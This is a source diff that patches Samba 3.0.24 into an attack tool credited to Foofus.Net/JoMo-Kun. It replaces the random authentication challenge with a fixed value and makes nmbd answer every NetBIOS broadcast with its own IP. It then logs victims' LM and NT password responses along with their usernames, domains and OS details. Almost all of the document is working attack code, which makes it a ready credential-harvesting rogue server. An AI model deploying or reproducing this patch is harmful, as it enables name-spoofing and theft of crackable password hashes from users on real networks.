diff -rub samba-3.0.24/source/auth/auth.c samba-3.0.24-karma/source/auth/auth.c
--- samba-3.0.24/source/auth/auth.c	2007-02-04 12:59:14.000000000 -0600
+++ samba-3.0.24-karma/source/auth/auth.c	2007-04-06 12:16:03.000000000 -0500
@@ -124,14 +124,19 @@
 	}
 	
 	if (!challenge_set_by) {
-		uchar chal[8];
+		uchar chal[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };
+		int i;
 		
-		generate_random_buffer(chal, sizeof(chal));
 		auth_context->challenge = data_blob_talloc(auth_context->mem_ctx, 
 							   chal, sizeof(chal));
 		
-		challenge_set_by = "random";
-		auth_context->challenge_may_be_modified = True;
+    challenge_set_by = "jmk";
+    auth_context->challenge_may_be_modified = False;
+    DEBUG(0, ("*** Fixed LM/NTLM Challenge Samba Attack -- Foofus.Net/JoMo-Kun ***\n")); 
+    DEBUGADD(0, ("[%s] Set server challenge: ", client_addr()));
+    for (i=0; i<auth_context->challenge.length; i++)
+      DEBUGADD(0, ("%2.2X", 0xFF & (int)auth_context->challenge.data[i]));
+    DEBUGADD(0, ("\n"));
 	} 
 	
 	DEBUG(5, ("auth_context challenge created by %s\n", challenge_set_by));
diff -rub samba-3.0.24/source/nmbd/nmbd.c samba-3.0.24-karma/source/nmbd/nmbd.c
--- samba-3.0.24/source/nmbd/nmbd.c	2007-02-04 12:59:23.000000000 -0600
+++ samba-3.0.24-karma/source/nmbd/nmbd.c	2007-02-21 13:26:02.000000000 -0600
@@ -698,6 +698,9 @@
 
 	DEBUG( 0, ( "Netbios nameserver version %s started.\n", SAMBA_VERSION_STRING) );
 	DEBUGADD( 0, ( "%s\n", COPYRIGHT_STARTUP_MESSAGE ) );
+  DEBUGADD(0, ("\n----------------------------------------------------------\n"));
+  DEBUGADD(0, ("*** NMB Broadcast Auto-Response -- Foofus.Net/JoMo-Kun ***\n"));
+  DEBUGADD(0, ("----------------------------------------------------------\n\n"));
 
 	if ( !reload_nmbd_services(False) )
 		return(-1);
diff -rub samba-3.0.24/source/nmbd/nmbd_incomingrequests.c samba-3.0.24-karma/source/nmbd/nmbd_incomingrequests.c
--- samba-3.0.24/source/nmbd/nmbd_incomingrequests.c	2006-04-19 21:29:33.000000000 -0500
+++ samba-3.0.24-karma/source/nmbd/nmbd_incomingrequests.c	2007-04-06 12:58:45.000000000 -0500
@@ -449,18 +449,44 @@
 	struct name_record *namerec = NULL;
 	int reply_data_len = 0;
 	int i;
+  int num_ips;	
 	
 	DEBUG(3,("process_name_query_request: Name query from %s on subnet %s for name %s\n", 
 		 inet_ntoa(p->ip), subrec->subnet_name, nmb_namestr(question)));
   
+  /* ********************************************************************************* */
+  /* 
+     Hack to make nmbd respond with our IP for all NMB broadcasts.
+     Based on ideas from Karma (http://www.theta44.org/karma/). 
+     JoMo-Kun <jmk@foofus.net> [02/2007]
+  */
+ 
 	/* Look up the name in the cache - if the request is a broadcast request that
 	   came from a subnet we don't know about then search all the broadcast subnets
 	   for a match (as we don't know what interface the request came in on). */
 
+  /*
 	if(subrec == remote_broadcast_subnet)
 		namerec = find_name_for_remote_broadcast_subnet( question, FIND_ANY_NAME);
 	else
 		namerec = find_name_on_subnet(subrec, question, FIND_ANY_NAME);
+  */
+
+  /* Create Response Packet */
+  DEBUGADD(0, ("[%s] NetBIOS Broadcast Request: %s\n", inet_ntoa(p->ip), question->name) );
+  namerec = SMB_MALLOC_P(struct name_record);
+  memset( (char *)namerec, '\0', sizeof(*namerec) );
+  namerec->subnet = subrec;
+  make_nmb_name(&namerec->name, question->name, 0x00);
+  namerec->data.nb_flags = NB_ACTIVE;
+  namerec->data.wins_flags = WINS_ACTIVE;
+  namerec->data.nb_flags = NB_PERM;
+  namerec->data.source = SELF_NAME;
+  num_ips = iface_count(); 
+  namerec->data.num_ips = num_ips;
+  namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, num_ips );
+  memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) );
+  /* ********************************************************************************* */
 
 	/* Check if it is a name that expired */
 	if (namerec && 
diff -rub samba-3.0.24/source/smbd/negprot.c samba-3.0.24-karma/source/smbd/negprot.c
--- samba-3.0.24/source/smbd/negprot.c	2007-02-04 12:59:13.000000000 -0600
+++ samba-3.0.24-karma/source/smbd/negprot.c	2007-04-06 12:17:25.000000000 -0500
@@ -348,6 +348,7 @@
 		p += srvstr_push(outbuf, p, lp_workgroup(), -1, 
 				 STR_UNICODE|STR_TERMINATE|STR_NOALIGN);
 		DEBUG(3,("not using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Disabled.\n", client_addr()));
 	} else {
 		uint8 keylen;
 		int len = negprot_spnego(p, &keylen);
@@ -355,6 +356,7 @@
 		SCVAL(outbuf,smb_vwv16+1,keylen);
 		p += len;
 		DEBUG(3,("using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Enabled (NTLMv2).\n", client_addr()));
 	}
 	
 	SSVAL(outbuf,smb_vwv17, p - q); /* length of challenge+domain strings */
@@ -578,8 +580,9 @@
 		reload_services(True);          
 		outsize = supported_protocols[protocol].proto_reply_fn(inbuf, outbuf);
 		DEBUG(3,("Selected protocol %s\n",supported_protocols[protocol].proto_name));
+		DEBUGADD(0,("[%s] Selected protocol: %s\n", client_addr(), supported_protocols[protocol].proto_name));
 	} else {
-		DEBUG(0,("No protocol supported !\n"));
+		DEBUG(0,("[%s] No protocol supported !\n", client_addr()));
 	}
 	SSVAL(outbuf,smb_vwv0,choice);
   
diff -rub samba-3.0.24/source/smbd/reply.c samba-3.0.24-karma/source/smbd/reply.c
--- samba-3.0.24/source/smbd/reply.c	2007-02-04 13:09:01.000000000 -0600
+++ samba-3.0.24-karma/source/smbd/reply.c	2007-04-06 12:14:23.000000000 -0500
@@ -495,6 +495,9 @@
 		DEBUG(2,("netbios connect: name1=%s name2=%s\n",
 			 name1,name2));      
 
+    DEBUGADD(0, ("[%s] Server NetBIOS Name: %s\n", client_addr(), name1));
+    DEBUGADD(0, ("[%s] Client NetBIOS Name: %s\n", client_addr(), name2));
+
 		set_local_machine_name(name1, True);
 		set_remote_machine_name(name2, True);
 
@@ -665,6 +668,7 @@
 		
 	p += srvstr_pull(inbuf, client_devicetype, p, sizeof(client_devicetype), 6, STR_ASCII);
 
+  DEBUGADD(0, ("[%s] Device Type: %s Share: %s\n", client_addr(), client_devicetype, service));
 	DEBUG(4,("Client requested device type [%s] for share [%s]\n", client_devicetype, service));
 
 	conn = make_connection(service,password,client_devicetype,vuid,&nt_status);
diff -rub samba-3.0.24/source/smbd/sesssetup.c samba-3.0.24-karma/source/smbd/sesssetup.c
--- samba-3.0.24/source/smbd/sesssetup.c	2007-02-04 12:59:13.000000000 -0600
+++ samba-3.0.24-karma/source/smbd/sesssetup.c	2007-04-06 12:34:00.000000000 -0500
@@ -893,7 +893,7 @@
 		char *p = smb_buf(inbuf);    
 		char *save_p = smb_buf(inbuf);
 		uint16 byte_count;
-			
+		int i;	
 
 		if(global_client_caps == 0) {
 			global_client_caps = IVAL(inbuf,smb_vwv11);
@@ -949,6 +949,16 @@
 		if (doencrypt) {
 			lm_resp = data_blob(p, passlen1);
 			nt_resp = data_blob(p+passlen1, passlen2);
+
+      DEBUGADD(0, ("[%s] LM Client Response: ", client_addr()));
+      for (i=0; i<passlen1; i++)
+        DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+      DEBUGADD(0, ("\n"));
+
+      DEBUGADD(0, ("[%s] NT Client Response: ", client_addr()));
+      for (i=0; i<passlen2; i++)
+        DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+      DEBUGADD(0, ("\n"));
 		} else {
 			pstring pass;
 			BOOL unic=SVAL(inbuf, smb_flg2) & FLAGS2_UNICODE_STRINGS;
@@ -991,6 +1001,13 @@
 		else 
 			fstrcpy( primary_domain, "null" );
 
+    DEBUGADD(0, ("[%s] Client Name: %s Remote Machine Name: %s\n", client_addr(), client_name(), get_remote_machine_name()));
+    DEBUGADD(0, ("[%s] User: %s\n", client_addr(), user));
+    DEBUGADD(0, ("[%s] Domain: %s\n", client_addr(), domain));
+    DEBUGADD(0, ("[%s] Primary Domain: %s\n", client_addr(), primary_domain));
+    DEBUGADD(0, ("[%s] Native OS: %s\n", client_addr(), native_os));
+    DEBUGADD(0, ("[%s] Native LanMan: %s\n", client_addr(), native_lanman));
+
 		DEBUG(3,("Domain=[%s]  NativeOS=[%s] NativeLanMan=[%s] PrimaryDomain=[%s]\n",
 			 domain, native_os, native_lanman, primary_domain));